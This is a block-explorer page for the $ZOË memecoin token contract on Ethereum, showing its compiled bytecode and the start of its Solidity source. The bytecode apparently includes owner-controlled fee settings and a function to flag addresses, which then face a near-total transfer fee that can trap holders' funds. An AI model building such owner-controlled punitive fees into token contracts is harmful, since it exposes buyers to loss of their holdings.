Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0x3b61f7DFEc33BbC1B11080b07918E0307066237e
Balance 0 ETH
Nonce 1
Code Size 14891 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

14891 bytes
0x6080604052600436106101855760003560e01c806370a08231116100d15780638cd4426d1161008a578063a8aa1b3111610064578063a8aa1b3114610555578063a9059cbb14610580578063dd62ed3e146105bd578063dfa3a2e3146105fa5761018c565b80638cd4426d146104d85780639213c3581461050157806395d89b411461052a5761018c565b806370a08231146103d8578063715018a61461041557806378109e541461042c5780637cca52fe146104575780637d1db4a514610482578063893d20e8146104ad5761018c565b80632f54bf6e1161013e5780633f4218e0116101185780633f4218e01461034457806348ff2b8b1461038157806351bc3c85146103aa57806351cd7cc3146103c15761018c565b80632f54bf6e146102b3578063313ce567146102f057806339efcf9e1461031b5761018c565b806306fdde0314610191578063095ea7b3146101bc57806318160ddd146101f95780631b5faebb146102245780632331777d1461024d57806323b872dd146102765761018c565b3661018c57005b600080fd5b34801561019d57600080fd5b506101a6610623565b6040516101b39190612a46565b60405180910390f35b3480156101c857600080fd5b506101e360048036038101906101de9190612b06565b610660565b6040516101f09190612b61565b60405180910390f35b34801561020557600080fd5b5061020e610677565b60405161021b9190612b8b565b60405180910390f35b34801561023057600080fd5b5061024b60048036038101906102469190612ba6565b6106b8565b005b34801561025957600080fd5b50610274600480360381019061026f9190612bf9565b61076c565b005b34801561028257600080fd5b5061029d60048036038101906102989190612c9b565b61088e565b6040516102aa9190612b61565b60405180910390f35b3480156102bf57600080fd5b506102da60048036038101906102d59190612cee565b610959565b6040516102e79190612b61565b60405180910390f35b3480156102fc57600080fd5b506103056109b2565b6040516103129190612d37565b60405180910390f35b34801561032757600080fd5b50610342600480360381019061033d9190612de3565b6109bb565b005b34801561035057600080fd5b5061036b60048036038101906103669190612cee565b610aa8565b6040516103789190612b61565b60405180910390f35b34801561038d57600080fd5b506103a860048036038101906103a39190612e43565b610ac8565b005b3480156103b657600080fd5b506103bf610b6b565b005b3480156103cd57600080fd5b506103d6610bc0565b005b3480156103e457600080fd5b506103ff60048036038101906103fa9190612cee565b610c25565b60405161040c9190612b8b565b60405180910390f35b34801561042157600080fd5b5061042a610c6e565b005b34801561043857600080fd5b50610441610d31565b60405161044e9190612b8b565b60405180910390f35b34801561046357600080fd5b5061046c610d37565b6040516104799190612b8b565b60405180910390f35b34801561048e57600080fd5b50610497610d3d565b6040516104a49190612b8b565b60405180910390f35b3480156104b957600080fd5b506104c2610d43565b6040516104cf9190612e92565b60405180910390f35b3480156104e457600080fd5b506104ff60048036038101906104fa9190612b06565b610d6c565b005b34801561050d57600080fd5b5061052860048036038101906105239190612ead565b610efd565b005b34801561053657600080fd5b5061053f611115565b60405161054c9190612a46565b60405180910390f35b34801561056157600080fd5b5061056a611152565b6040516105779190612e92565b60405180910390f35b34801561058c57600080fd5b506105a760048036038101906105a29190612b06565b611178565b6040516105b49190612b61565b60405180910390f35b3480156105c957600080fd5b506105e460048036038101906105df9190612f00565b61118f565b6040516105f19190612b8b565b60405180910390f35b34801561060657600080fd5b50610621600480360381019061061c9190612ba6565b611216565b005b60606040518060400160405280600481526020017f5a6fc3ab00000000000000000000000000000000000000000000000000000000815250905090565b600061066d338484611391565b6001905092915050565b60006106b36106866000610c25565b6106a561069461dead610c25565b60015461155a90919063ffffffff16565b61155a90919063ffffffff16565b905090565b6106c133610959565b610700576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106f790612f8c565b60405180910390fd5b82600a81905550610731620186a06107238460015461157090919063ffffffff16565b61158690919063ffffffff16565b600b81905550610761620186a06107538360015461157090919063ffffffff16565b61158690919063ffffffff16565b600c81905550505050565b61077533610959565b6107b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107ab90612f8c565b60405180910390fd5b86600d8190555085600e819055508460108190555083600f819055508260118190555081601281905550806013819055506107fb600160145461158690919063ffffffff16565b60115411158015610823575061081d600160145461158690919063ffffffff16565b60125411155b80156108465750610840600160145461158690919063ffffffff16565b60135411155b610885576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161087c9061301e565b60405180910390fd5b50505050505050565b600061089b84848461159c565b61094e8433610949856040518060600160405280602881526020016139ce60289139600360008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611e669092919063ffffffff16565b611391565b600190509392505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16149050919050565b60006009905090565b6109c433610959565b610a03576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fa90612f8c565b60405180910390fd5b60005b83839050811015610aa2578160056000868685818110610a2957610a2861303e565b5b9050602002016020810190610a3e9190612cee565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508080610a9a9061309c565b915050610a06565b50505050565b60046020528060005260406000206000915054906101000a900460ff1681565b610ad133610959565b610b10576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b0790612f8c565b60405180910390fd5b80600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b610b7433610959565b610bb3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610baa90612f8c565b60405180910390fd5b610bbe600b54611ebb565b565b610bc933610959565b610c08576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bff90612f8c565b60405180910390fd5b6001600760146101000a81548160ff021916908315150217905550565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610c7733610959565b610cb6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cad90612f8c565b60405180910390fd5b60008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507f04dba622d284ed0014ee4b9a6a68386be1a4c08a4913ae272de89199cc6861636000604051610d279190612e92565b60405180910390a1565b601a5481565b60195481565b60185481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b610d7533610959565b610db4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dab90612f8c565b60405180910390fd5b6000610e556064610e47848673ffffffffffffffffffffffffffffffffffffffff166370a08231306040518263ffffffff1660e01b8152600401610df89190612e92565b602060405180830381865afa158015610e15573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e3991906130f9565b61157090919063ffffffff16565b61158690919063ffffffff16565b90508273ffffffffffffffffffffffffffffffffffffffff1663a9059cbb601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16836040518363ffffffff1660e01b8152600401610eb4929190613126565b6020604051808303816000875af1158015610ed3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ef79190613164565b50505050565b610f0633610959565b610f45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f3c90612f8c565b60405180910390fd5b82601660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555081601760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080601560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550505050565b60606040518060400160405280600481526020017f5a4fc38b00000000000000000000000000000000000000000000000000000000815250905090565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600061118533848461159c565b6001905092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61121f33610959565b61125e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161125590612f8c565b60405180910390fd5b600061128961271061127b8660015461157090919063ffffffff16565b61158690919063ffffffff16565b905060006112b66127106112a88660015461157090919063ffffffff16565b61158690919063ffffffff16565b905060006112e36127106112d58660015461157090919063ffffffff16565b61158690919063ffffffff16565b9050826018819055508160198190555080601a81905550600061132b6103e861131d600561130f610677565b61157090919063ffffffff16565b61158690919063ffffffff16565b905080841015801561133d5750808310155b80156113495750808210155b611388576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161137f90613203565b60405180910390fd5b50505050505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611400576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113f790613295565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361146f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161146690613327565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161154d9190612b8b565b60405180910390a3505050565b600081836115689190613347565b905092915050565b6000818361157e919061337b565b905092915050565b6000818361159491906133ec565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361160b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116029061348f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361167a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161167190613521565b60405180910390fd5b61168383610c25565b8111156116c5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116bc906135b3565b60405180910390fd5b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156117695750600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156117be57600760149054906101000a900460ff166117bd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117b49061361f565b60405180910390fd5b5b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156118625750600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156118bc5750600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b80156118f6575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b1561199257601a5461195082600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461212890919063ffffffff16565b1115611991576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119889061368b565b60405180910390fd5b5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611ad55760195481111580611a415750600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b80611a955750600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b611ad4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611acb906136f7565b60405180910390fd5b5b60185481111580611b2f5750600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b80611b835750600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b611bc2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bb9906136f7565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16148015611c695750600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611c8957600160086000828254611c819190613717565b925050819055505b611c9483838361213e565b15611cad57611ca4600b54611ebb565b60006008819055505b611cff81600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461155a90919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055506000611d4e8484612278565b611d585781611d64565b611d63848484612326565b5b9050611db881600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461212890919063ffffffff16565b600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611e589190612b8b565b60405180910390a350505050565b6000838311158290611eae576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ea59190612a46565b60405180910390fd5b5082840390509392505050565b6001600960006101000a81548160ff0219169083151502179055506000611f296002611f1b600f54611f0d600e54611eff6001600d5461212890919063ffffffff16565b61212890919063ffffffff16565b61212890919063ffffffff16565b61157090919063ffffffff16565b90506000611f5482611f46600d548661157090919063ffffffff16565b61158690919063ffffffff16565b90506000611f6b828561155a90919063ffffffff16565b90506000479050611f7b826124e4565b6000611f90824761155a90919063ffffffff16565b90506000611fbb611fac600d548861155a90919063ffffffff16565b8361158690919063ffffffff16565b90506000611fd4600d548361157090919063ffffffff16565b90506000811115611fea57611fe98682612727565b5b6000612014600e5461200660028661157090919063ffffffff16565b61157090919063ffffffff16565b9050600081111561208957601660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f19350505050158015612087573d6000803e3d6000fd5b505b6000479050600081111561210157601560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc829081150290604051600060405180830381858888f193505050501580156120ff573d6000803e3d6000fd5b505b5050505050505050506000600960006101000a81548160ff02191690831515021790555050565b600081836121369190613717565b905092915050565b600080600c5483101590506000600b5461215730610c25565b10159050600960009054906101000a900460ff161580156121845750600760159054906101000a900460ff165b801561219c5750600760149054906101000a900460ff165b80156121a55750815b80156121fb5750600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156122545750600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b80156122645750600a5460085410155b801561226d5750805b925050509392505050565b6000600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615801561231e5750600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b905092915050565b6000806123338585612827565b11156124d957600061236b6123488686612827565b61235d6014548661158690919063ffffffff16565b61157090919063ffffffff16565b90506123bf81600260003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461212890919063ffffffff16565b600260003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161245f9190612b8b565b60405180910390a3600060105411801561248357506010546124818686612827565b115b156124be576124bd3061dead6124b86010546124aa6014548961158690919063ffffffff16565b61157090919063ffffffff16565b61159c565b5b6124d1818461155a90919063ffffffff16565b9150506124dd565b8190505b9392505050565b6000600267ffffffffffffffff8111156125015761250061374b565b5b60405190808252806020026020018201604052801561252f5781602001602082028036833780820191505090505b50905030816000815181106125475761254661303e565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156125ee573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190612612919061378f565b816001815181106126265761262561303e565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505061268d30600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684611391565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b81526004016126f19594939291906138bf565b600060405180830381600087803b15801561270b57600080fd5b505af115801561271f573d6000803e3d6000fd5b505050505050565b61275430600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684611391565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080601760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b81526004016127dd96959493929190613919565b60606040518083038185885af11580156127fb573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190612820919061397a565b5050505050565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806128ca5750600560008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156128ec576128e5606460145461155a90919063ffffffff16565b90506129b0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361294b5760125490506129b0565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036129aa5760115490506129b0565b60135490505b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156129f05780820151818401526020810190506129d5565b60008484015250505050565b6000601f19601f8301169050919050565b6000612a18826129b6565b612a2281856129c1565b9350612a328185602086016129d2565b612a3b816129fc565b840191505092915050565b60006020820190508181036000830152612a608184612a0d565b905092915050565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000612a9d82612a72565b9050919050565b612aad81612a92565b8114612ab857600080fd5b50565b600081359050612aca81612aa4565b92915050565b6000819050919050565b612ae381612ad0565b8114612aee57600080fd5b50565b600081359050612b0081612ada565b92915050565b60008060408385031215612b1d57612b1c612a68565b5b6000612b2b85828601612abb565b9250506020612b3c85828601612af1565b9150509250929050565b60008115159050919050565b612b5b81612b46565b82525050565b6000602082019050612b766000830184612b52565b92915050565b612b8581612ad0565b82525050565b6000602082019050612ba06000830184612b7c565b92915050565b600080600060608486031215612bbf57612bbe612a68565b5b6000612bcd86828701612af1565b9350506020612bde86828701612af1565b9250506040612bef86828701612af1565b9150509250925092565b600080600080600080600060e0888a031215612c1857612c17612a68565b5b6000612c268a828b01612af1565b9750506020612c378a828b01612af1565b9650506040612c488a828b01612af1565b9550506060612c598a828b01612af1565b9450506080612c6a8a828b01612af1565b93505060a0612c7b8a828b01612af1565b92505060c0612c8c8a828b01612af1565b91505092959891949750929550565b600080600060608486031215612cb457612cb3612a68565b5b6000612cc286828701612abb565b9350506020612cd386828701612abb565b9250506040612ce486828701612af1565b9150509250925092565b600060208284031215612d0457612d03612a68565b5b6000612d1284828501612abb565b91505092915050565b600060ff82169050919050565b612d3181612d1b565b82525050565b6000602082019050612d4c6000830184612d28565b92915050565b600080fd5b600080fd5b600080fd5b60008083601f840112612d7757612d76612d52565b5b8235905067ffffffffffffffff811115612d9457612d93612d57565b5b602083019150836020820283011115612db057612daf612d5c565b5b9250929050565b612dc081612b46565b8114612dcb57600080fd5b50565b600081359050612ddd81612db7565b92915050565b600080600060408486031215612dfc57612dfb612a68565b5b600084013567ffffffffffffffff811115612e1a57612e19612a6d565b5b612e2686828701612d61565b93509350506020612e3986828701612dce565b9150509250925092565b60008060408385031215612e5a57612e59612a68565b5b6000612e6885828601612abb565b9250506020612e7985828601612dce565b9150509250929050565b612e8c81612a92565b82525050565b6000602082019050612ea76000830184612e83565b92915050565b600080600060608486031215612ec657612ec5612a68565b5b6000612ed486828701612abb565b9350506020612ee586828701612abb565b9250506040612ef686828701612abb565b9150509250925092565b60008060408385031215612f1757612f16612a68565b5b6000612f2585828601612abb565b9250506020612f3685828601612abb565b9150509250929050565b7f214f574e45520000000000000000000000000000000000000000000000000000600082015250565b6000612f766006836129c1565b9150612f8182612f40565b602082019050919050565b60006020820190508181036000830152612fa581612f69565b9050919050565b7f746f74616c46656520616e642073656c6c4665652063616e6e6f74206265206d60008201527f6f7265207468616e203230250000000000000000000000000000000000000000602082015250565b6000613008602c836129c1565b915061301382612fac565b604082019050919050565b6000602082019050818103600083015261303781612ffb565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006130a782612ad0565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036130d9576130d861306d565b5b600182019050919050565b6000815190506130f381612ada565b92915050565b60006020828403121561310f5761310e612a68565b5b600061311d848285016130e4565b91505092915050565b600060408201905061313b6000830185612e83565b6131486020830184612b7c565b9392505050565b60008151905061315e81612db7565b92915050565b60006020828403121561317a57613179612a68565b5b60006131888482850161314f565b91505092915050565b7f4d61782054587320616e64204d61782057616c6c65742063616e6e6f7420626560008201527f206c657373207468616e202e3525000000000000000000000000000000000000602082015250565b60006131ed602e836129c1565b91506131f882613191565b604082019050919050565b6000602082019050818103600083015261321c816131e0565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061327f6024836129c1565b915061328a82613223565b604082019050919050565b600060208201905081810360008301526132ae81613272565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006133116022836129c1565b915061331c826132b5565b604082019050919050565b6000602082019050818103600083015261334081613304565b9050919050565b600061335282612ad0565b915061335d83612ad0565b92508282039050818111156133755761337461306d565b5b92915050565b600061338682612ad0565b915061339183612ad0565b925082820261339f81612ad0565b915082820484148315176133b6576133b561306d565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b60006133f782612ad0565b915061340283612ad0565b925082613412576134116133bd565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006134796025836129c1565b91506134848261341d565b604082019050919050565b600060208201905081810360008301526134a88161346c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061350b6023836129c1565b9150613516826134af565b604082019050919050565b6000602082019050818103600083015261353a816134fe565b9050919050565b7f596f752061726520747279696e6720746f207472616e73666572206d6f72652060008201527f7468616e20796f75722062616c616e6365000000000000000000000000000000602082015250565b600061359d6031836129c1565b91506135a882613541565b604082019050919050565b600060208201905081810360008301526135cc81613590565b9050919050565b7f74726164696e67416c6c6f776564000000000000000000000000000000000000600082015250565b6000613609600e836129c1565b9150613614826135d3565b602082019050919050565b60006020820190508181036000830152613638816135fc565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420616d6f756e742e0000600082015250565b6000613675601e836129c1565b91506136808261363f565b602082019050919050565b600060208201905081810360008301526136a481613668565b9050919050565b7f5458204c696d6974204578636565646564000000000000000000000000000000600082015250565b60006136e16011836129c1565b91506136ec826136ab565b602082019050919050565b60006020820190508181036000830152613710816136d4565b9050919050565b600061372282612ad0565b915061372d83612ad0565b92508282019050808211156137455761374461306d565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b60008151905061378981612aa4565b92915050565b6000602082840312156137a5576137a4612a68565b5b60006137b38482850161377a565b91505092915050565b6000819050919050565b6000819050919050565b60006137eb6137e66137e1846137bc565b6137c6565b612ad0565b9050919050565b6137fb816137d0565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61383681612a92565b82525050565b6000613848838361382d565b60208301905092915050565b6000602082019050919050565b600061386c82613801565b613876818561380c565b93506138818361381d565b8060005b838110156138b2578151613899888261383c565b97506138a483613854565b925050600181019050613885565b5085935050505092915050565b600060a0820190506138d46000830188612b7c565b6138e160208301876137f2565b81810360408301526138f38186613861565b90506139026060830185612e83565b61390f6080830184612b7c565b9695505050505050565b600060c08201905061392e6000830189612e83565b61393b6020830188612b7c565b61394860408301876137f2565b61395560608301866137f2565b6139626080830185612e83565b61396f60a0830184612b7c565b979650505050505050565b60008060006060848603121561399357613992612a68565b5b60006139a1868287016130e4565b93505060206139b2868287016130e4565b92505060406139c3868287016130e4565b915050925092509256fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220dc923c21b67978fa3c2d9cb6f9d92ec59a04926e46974f80d9da976a97d5e94e64736f6c63430008130033

Verified Source Code Partial Match

Compiler: v0.8.19+commit.7dd6d404 EVM: paris Optimization: No
ZOE.sol 359 lines
/**
$ZOË - The Twitter Founder's Cat

https://x.com/jack/status/1586890166?s=20

https://t.me/Zoe_Coin

https://twitter.com/zoecoin_ETH

https://www.zoe-coin.com/


*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.19;


library SafeMath {

    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

interface IERC20 {
    function decimals() external view returns (uint8);
    function symbol() external view returns (string memory);
    function name() external view returns (string memory);
    function getOwner() external view returns (address);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address _owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);}

abstract contract Ownable {
    address internal owner;
    constructor(address _owner) {owner = _owner;}
    modifier onlyOwner() {require(isOwner(msg.sender), "!OWNER"); _;}
    function isOwner(address account) public view returns (bool) {return account == owner;}
    function  renounceOwnership() public onlyOwner {
        owner = address(0); 
        emit OwnershipTransferred(address(0));
    }
    event OwnershipTransferred(address owner);
}

interface IFactory{
        function createPair(address tokenA, address tokenB) external returns (address pair);
        function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IRouter {
